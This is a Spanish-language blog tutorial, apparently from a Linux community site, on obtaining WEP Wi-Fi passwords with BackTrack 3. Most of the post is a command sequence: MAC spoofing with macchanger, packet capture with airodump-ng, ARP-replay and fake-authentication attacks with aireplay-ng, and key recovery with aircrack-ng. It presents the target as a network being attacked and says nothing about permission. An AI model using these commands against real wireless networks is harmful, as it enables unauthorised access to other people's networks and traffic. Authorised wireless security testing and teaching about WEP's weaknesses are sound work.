Información
Actualidad
Aquí encontraras noticias de actualidad sobre Gnu Linux y Open Source.

Además de información sobre la comunidad LiGNUx.
Distribuciones y entornos
Información ordenada sobre los diferenes sistema operativos Gnu Linux y las diferentes opciones de entornos gráficos.
Tutoriales y guías
Todos los pasos e informaciones que puedes desear para tu día a día.
Tutoriales
Tutoriales
Programación
Programación
About Us
Get to know the people behind the code and the mission behind the work
how we handle data
Privacy
Security
Legal

Obtener contraseñas WEP usando BackTrack 3

29 septiembre, 2014

Es cierto que hay tutoriales más avanzados para obtener contraseñas WEP, e incluso WPA, con versiones más modernas de BackTrack, como la versión 5, pero me quería estrenar en este sitio con algo que me conozco casi de memoria. Tranquilos, tengo pendiente jugar un poco con BackTrack 5 para sacar un nuevo tutorial más actualizado.

obtener wep

Pero bueno, a lo que vamos, cómo obtener contraseñas WEP usando la versión 3 de BackTrack. Lo primero y fundamental es tener BackTrack instalado en otra partición o en una máquina virtual. Después, simplemente hay que seguir los siguientes pasos:
1. Primero hay que comprobar si hay alguna red WEP cercana. Para ello, vamos a Inicio -> Internet -> Wireless Assistant".

2. Después abrimos la consola y tecleamos los siguientes comandos:

airmon-ng stop wifi0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0 -c (Canal)
airodump-ng wifi0

3. Miramos el BSSID y lo copiamos. A continuación, tecleamos lo siguiente:

airodump-ng -c (canal) -w mike --bssid (BSSID copiado) wifi0

4. Desde una nueva consola iniciamos un ataque de tipo 3 (Reinyección de peticiones ARP). Si hay algún cliente conectado a la red que atacamos, en -h usaremos la MAC del cliente en lugar de la nuestra falseada de la siguiente forma:

aireplay-ng -3 -b (BSSID que hemos copiado) -h 00:11:22:33:44:55 wifi0

5. Si no hay ningún cliente conectado a la red que atacamos, desde una nueva consola iniciamos un ataque de tipo 1 (autenticación falsa) para generar tráfico:

aireplay-ng -1 0 -a (BSSID que hemos copiado) -h 00:11:22:33:44:55 -e (ESSID) wifi0

6. Por último, esperamos a que el #Data en el airodump-ng vaya subiendo hasta llegar como mínimo a 30.000, y después desde una nueva consola probamos el primer comando (aircrack-ng n 64 mike-01.cap) y en unos minutos ya tendremos la clave.

Y esto ha sido todo, espero que os haya gustado el tutorial y esperemos volver a publicar algún tutorial por aquí pronto.

Escrito por La gaceta de Android

Me gustan las nuevas tecnologías, me enfoco especialmente en el software libre. Tengo un PC con Ubuntu y un móvil con Android.

Suscribirse
Notificarme las
guest
9 Comentarios
Los más recientes
Los más antiguos Más votados
Feedbacks en línea
Ver todos los comentarios
LiGNUx trabaja sobre una licencia de Creative Commons Reconocimiento 4.0 Internacional.
cloudflagpaperclipprinterfile-emptyfilm-playcamera-videopicturelaptop-phonebriefcasecrossmenu
linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram